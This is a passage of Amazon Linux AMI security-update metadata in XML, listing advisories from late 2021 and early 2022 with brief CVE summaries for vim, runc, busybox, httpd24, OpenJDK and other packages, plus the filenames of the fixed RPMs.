arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.261-2.6.22.1.84.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.261" release="2.6.22.1.84.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.261-2.6.22.1.84.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.261" release="2.6.22.1.84.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.261-2.6.22.1.84.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.261" release="2.6.22.1.84.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.261-2.6.22.1.84.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.41" release="1.13.13.1.78.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.41-1.13.13.1.78.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.41" release="1.13.13.1.78.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.41-1.13.13.1.78.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.41" release="1.13.13.1.78.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.41-1.13.13.1.78.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.41" release="1.13.13.1.78.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.41-1.13.13.1.78.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.41" release="1.13.13.1.78.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.41-1.13.13.1.78.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.41" release="1.13.13.1.78.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.41-1.13.13.1.78.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.41" release="1.13.13.1.78.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.41-1.13.13.1.78.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.41" release="1.13.13.1.78.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.41-1.13.13.1.78.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.41" release="1.13.13.1.78.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.41-1.13.13.1.78.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.41" release="1.13.13.1.78.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.41-1.13.13.1.78.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.41" release="1.13.13.1.78.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.41-1.13.13.1.78.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.41" release="1.13.13.1.78.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.41-1.13.13.1.78.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.312.b07" release="0.66.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.312.b07-0.66.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.312.b07" release="0.66.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.312.b07-0.66.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.312.b07" release="0.66.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.312.b07-0.66.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.312.b07" release="0.66.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.312.b07-0.66.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.312.b07" release="0.66.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.312.b07-0.66.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.312.b07" release="0.66.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.312.b07-0.66.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.312.b07" release="0.66.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.312.b07-0.66.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.312.b07" release="0.66.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.312.b07-0.66.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.312.b07" release="0.66.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.312.b07-0.66.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.312.b07" release="0.66.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.312.b07-0.66.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.312.b07" release="0.66.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.312.b07-0.66.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.312.b07" release="0.66.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.312.b07-0.66.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.312.b07" release="0.66.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.312.b07-0.66.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.312.b07" release="0.66.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.312.b07-0.66.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1554</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1554: important priority package update for log4j-cve-2021-44228-hotpatch</title><issued date="2021-12-22 21:18:00" /><updated date="2022-04-28 05:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-3100:
The Apache Log4j hotpatch package starting with log4j-cve-2021-44228-hotpatch-1.1-13 will now explicitly mimic the permissions of the JVM attempting to be updated.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3100" title="" id="CVE-2021-3100" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="log4j-cve-2021-44228-hotpatch" version="1.1" release="13.amzn1" epoch="0" arch="noarch"><filename>Packages/log4j-cve-2021-44228-hotpatch-1.1-13.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1555</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1555: medium priority package update for containerd</title><issued date="2021-12-28 23:54:00" /><updated date="2021-12-29 00:02:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-15157:
A flaw was found in containerd. Credentials may be leaked during an image pull.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15157" title="" id="CVE-2020-15157" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="containerd-debuginfo" version="1.3.2" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-debuginfo-1.3.2-1.3.amzn1.x86_64.rpm</filename></package><package name="containerd-stress" version="1.3.2" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-stress-1.3.2-1.3.amzn1.x86_64.rpm</filename></package><package name="containerd" version="1.3.2" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-1.3.2-1.3.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1556</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1556: important priority package update for runc</title><issued date="2021-12-28 23:55:00" /><updated date="2025-04-23 21:11:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-19921:
A flaw was found in runc. An attacker who controls the container image for two containers that share a volume can race volume mounts during container initialization, by adding a symlink to the rootfs that points to a directory on the volume. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
CVE-2019-16884:
runc through 1.0.0-rc8, as used in Docker through 19.03.2-ce and other products, allows AppArmor restriction bypass because libcontainer/rootfs_linux.go incorrectly checks mount targets, and thus a malicious Docker image can mount over a /proc directory.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16884" title="" id="CVE-2019-16884" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19921" title="" id="CVE-2019-19921" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="runc" version="1.0.0" release="0.1.20200204.gitdc9208a.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/runc-1.0.0-0.1.20200204.gitdc9208a.1.amzn1.x86_64.rpm</filename></package><package name="runc-debuginfo" version="1.0.0" release="0.1.20200204.gitdc9208a.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/runc-debuginfo-1.0.0-0.1.20200204.gitdc9208a.1.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1557</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1557: medium priority package update for vim</title><issued date="2022-01-18 20:12:00" /><updated date="2024-05-09 17:43:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-4193:
It was found that vim was vulnerable to an out-of-bound read flaw in getvcol(). A specially crafted file could be used to, when opened in vim, disclose some of the process's internal memory.
CVE-2021-4192:
It was found that vim was vulnerable to use-after-free flaw in win_linetabsize(). Sourcing a specially crafted file in vim could crash the vim process or possibly lead to other undefined behaviors.
CVE-2021-4187:
A flaw was found in vim. A possible use after free vulnerability could allow an attacker to input a specially crafted file leading to a crash or code execution.
CVE-2021-4173:
A flaw was found in vim. A possible use after free vulnerability could allow an attacker to input a specially crafted file leading to a crash or code execution.
CVE-2021-4166:
A flaw was found in vim. A possible heap-based buffer overflow could allow an attacker to input a specially crafted file leading to a crash or code execution.
CVE-2021-4136:
A flaw was found in vim. A possible heap-based buffer overflow could allow an attacker to input a specially crafted file leading to a crash or code execution.
CVE-2021-4069:
vim is vulnerable to Use After Free
CVE-2021-4019:
A flaw was found in vim. A possible heap-based buffer overflow vulnerability allows an attacker to input a specially crafted file, leading to a crash or code execution. The highest threat from this vulnerability is system availability.
CVE-2021-3984:
A flaw was found in vim. A possible heap-based buffer overflow allows an attacker to input a specially crafted file, leading to a crash or code execution. The highest threat from this vulnerability is confidentiality, integrity, and system availability.
CVE-2021-3974:
A flaw was found in vim. A possible use-after-free vulnerability could allow an attacker to input a specially crafted file leading to a crash or code execution. The highest threat from this vulnerability is to system availability.
CVE-2021-3973:
A flaw was found in vim. A possible heap-based buffer overflow could allow an attacker to input a specially crafted file leading to a crash or code execution. The highest threat from this vulnerability is to system availability.
CVE-2021-3968:
A flaw was found in vim. A possible heap use-after-free vulnerability could allow an attacker to input a specially crafted file leading to a crash or code execution. The highest threat from this vulnerability is to system availability.
CVE-2021-3928:
A flaw was found in vim. A possible stack-based buffer overflow could allow an attacker to input a specially crafted file leading to a crash or code execution. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
CVE-2021-3927:
A flaw was found in vim. A possible heap-based buffer overflow could allow an attacker to input a specially crafted file leading to a crash or code execution. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
CVE-2021-3903:
vim is vulnerable to Heap-based Buffer Overflow
CVE-2020-20703:
Buffer Overflow vulnerability in VIM v.8.1.2135 allows a remote attacker to execute arbitrary code via the operand parameter.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-20703" title="" id="CVE-2020-20703" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3903" title="" id="CVE-2021-3903" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3927" title="" id="CVE-2021-3927" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3928" title="" id="CVE-2021-3928" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3968" title="" id="CVE-2021-3968" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3973" title="" id="CVE-2021-3973" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3974" title="" id="CVE-2021-3974" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3984" title="" id="CVE-2021-3984" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4019" title="" id="CVE-2021-4019" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4069" title="" id="CVE-2021-4069" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4136" title="" id="CVE-2021-4136" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4166" title="" id="CVE-2021-4166" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4173" title="" id="CVE-2021-4173" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4187" title="" id="CVE-2021-4187" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4192" title="" id="CVE-2021-4192" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4193" title="" id="CVE-2021-4193" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="vim-enhanced" version="8.2.4006" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-enhanced-8.2.4006-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-data" version="8.2.4006" release="1.1.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-data-8.2.4006-1.1.amzn1.noarch.rpm</filename></package><package name="vim-minimal" version="8.2.4006" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-minimal-8.2.4006-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-debuginfo" version="8.2.4006" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-debuginfo-8.2.4006-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-filesystem" version="8.2.4006" release="1.1.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-filesystem-8.2.4006-1.1.amzn1.noarch.rpm</filename></package><package name="vim-common" version="8.2.4006" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-common-8.2.4006-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-minimal" version="8.2.4006" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-minimal-8.2.4006-1.1.amzn1.i686.rpm</filename></package><package name="vim-enhanced" version="8.2.4006" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-enhanced-8.2.4006-1.1.amzn1.i686.rpm</filename></package><package name="vim-common" version="8.2.4006" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-common-8.2.4006-1.1.amzn1.i686.rpm</filename></package><package name="vim-debuginfo" version="8.2.4006" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-debuginfo-8.2.4006-1.1.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1558</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1558: medium priority package update for busybox</title><issued date="2022-01-18 20:13:00" /><updated date="2023-02-17 00:02:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-42386:
A flaw was found in BusyBox, where it did not properly sanitize while processing a crafted awk pattern in the nvalloc function, leading to possible code execution. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
CVE-2021-42385:
A flaw was found in BusyBox, where it did not properly sanitize while processing a crafted awk pattern in the evaluate function, leading to possible code execution. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
CVE-2021-42384:
A flaw was found in BusyBox, where it did not properly sanitize while processing a crafted awk pattern in the handle_special function, leading to possible code execution. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
CVE-2021-42379:
A flaw was found in BusyBox, where it did not properly sanitize while processing a crafted awk pattern in the next_input_file function, leading to possible code execution. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
CVE-2021-42378:
A flaw was found in BusyBox, where it did not properly sanitize while processing a crafted awk pattern, leading to possible code execution. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
CVE-2021-42376:
A flaw was found in BusyBox, where it did not properly sanitize while processing a crafted shell command, leading to a denial of service. The highest threat from this vulnerability is to system availability.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42376" title="" id="CVE-2021-42376" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42378" title="" id="CVE-2021-42378" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42379" title="" id="CVE-2021-42379" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42384" title="" id="CVE-2021-42384" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42385" title="" id="CVE-2021-42385" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42386" title="" id="CVE-2021-42386" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="busybox" version="1.34.1" release="1.13.amzn1" epoch="1" arch="x86_64"><filename>Packages/busybox-1.34.1-1.13.amzn1.x86_64.rpm</filename></package><package name="busybox-debuginfo" version="1.34.1" release="1.13.amzn1" epoch="1" arch="x86_64"><filename>Packages/busybox-debuginfo-1.34.1-1.13.amzn1.x86_64.rpm</filename></package><package name="busybox-petitboot" version="1.34.1" release="1.13.amzn1" epoch="1" arch="x86_64"><filename>Packages/busybox-petitboot-1.34.1-1.13.amzn1.x86_64.rpm</filename></package><package name="busybox" version="1.34.1" release="1.13.amzn1" epoch="1" arch="i686"><filename>Packages/busybox-1.34.1-1.13.amzn1.i686.rpm</filename></package><package name="busybox-petitboot" version="1.34.1" release="1.13.amzn1" epoch="1" arch="i686"><filename>Packages/busybox-petitboot-1.34.1-1.13.amzn1.i686.rpm</filename></package><package name="busybox-debuginfo" version="1.34.1" release="1.13.amzn1" epoch="1" arch="i686"><filename>Packages/busybox-debuginfo-1.34.1-1.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1559</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1559: important priority package update for cyrus-imapd</title><issued date="2022-01-18 20:13:00" /><updated date="2022-01-19 22:21:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-33582:
A flaw was found in cyrus-imapd. A bad string hashing algorithm used in internal hash tables allows user inputs to be stored in predictable buckets. A user may cause a CPU denial of service by maliciously directing many inputs to a single bucket. The highest threat from this vulnerability is to system availability.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33582" title="" id="CVE-2021-33582" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cyrus-imapd" version="2.4.22" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-imapd-2.4.22-1.10.amzn1.x86_64.rpm</filename></package><package name="cyrus-imapd-debuginfo" version="2.4.22" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-imapd-debuginfo-2.4.22-1.10.amzn1.x86_64.rpm</filename></package><package name="cyrus-imapd-utils" version="2.4.22" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-imapd-utils-2.4.22-1.10.amzn1.x86_64.rpm</filename></package><package name="cyrus-imapd-devel" version="2.4.22" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-imapd-devel-2.4.22-1.10.amzn1.x86_64.rpm</filename></package><package name="cyrus-imapd" version="2.4.22" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-imapd-2.4.22-1.10.amzn1.i686.rpm</filename></package><package name="cyrus-imapd-utils" version="2.4.22" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-imapd-utils-2.4.22-1.10.amzn1.i686.rpm</filename></package><package name="cyrus-imapd-debuginfo" version="2.4.22" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-imapd-debuginfo-2.4.22-1.10.amzn1.i686.rpm</filename></package><package name="cyrus-imapd-devel" version="2.4.22" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-imapd-devel-2.4.22-1.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1560</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1560: important priority package update for httpd24</title><issued date="2022-01-18 20:14:00" /><updated date="2022-01-19 22:20:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-44790:
A buffer overflow flaw in httpd's lua module could allow an out-of-bounds write. An attacker who is able to submit a crafted request to an httpd instance that is using the lua module may be able to cause an impact to confidentiality, integrity, and/or availability.
CVE-2021-44224:
There's a null pointer dereference and server-side request forgery flaw in httpd's mod_proxy module, when it is configured to be used as a forward proxy. A crafted packet could be sent on the adjacent network to the forward proxy that could cause a crash, or potentially SSRF via misdirected Unix Domain Socket requests. In the worst case, this could cause a denial of service or compromise to confidentiality of data.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44224" title="" id="CVE-2021-44224" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44790" title="" id="CVE-2021-44790" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_ssl" version="2.4.52" release="1.95.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.52-1.95.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.52" release="1.95.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.52-1.95.amzn1.noarch.rpm</filename></package><package name="httpd24-tools" version="2.4.52" release="1.95.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.52-1.95.amzn1.x86_64.rpm</filename></package><package name="mod24_ldap" version="2.4.52" release="1.95.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.52-1.95.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.52" release="1.95.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.52-1.95.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.52" release="1.95.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.52-1.95.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.52" release="1.95.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.52-1.95.amzn1.x86_64.rpm</filename></package><package name="mod24_md" version="2.4.52" release="1.95.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_md-2.4.52-1.95.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.52" release="1.95.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.52-1.95.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.52" release="1.95.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.52-1.95.amzn1.x86_64.rpm</filename></package><package name="mod24_ssl" version="2.4.52" release="1.95.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.52-1.95.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.52" release="1.95.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.52-1.95.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.52" release="1.95.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.52-1.95.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.52" release="1.95.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.52-1.95.amzn1.i686.rpm</filename></package><package name="mod24_md" version="2.4.52" release="1.95.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_md-2.4.52-1.95.amzn1.i686.rpm</filename></package><package name="mod24_proxy_html" version="2.4.52" release="1.95.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.52-1.95.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.52" release="1.95.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.52-1.95.amzn1.i686.rpm</filename></package><package name="mod24_session" version="2.4.52" release="1.95.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.52-1.95.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.52" release="1.95.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.52-1.95.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1561</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1561: important priority package update for java-1.8.0-openjdk</title><issued date="2022-01-18 20:14:00" /><updated date="2022-01-19 22:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-35603:
Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JSSE). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N).
CVE-2021-35588:
Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Java SE: 7u311, 8u301; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.1 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L).
CVE-2021-35586:
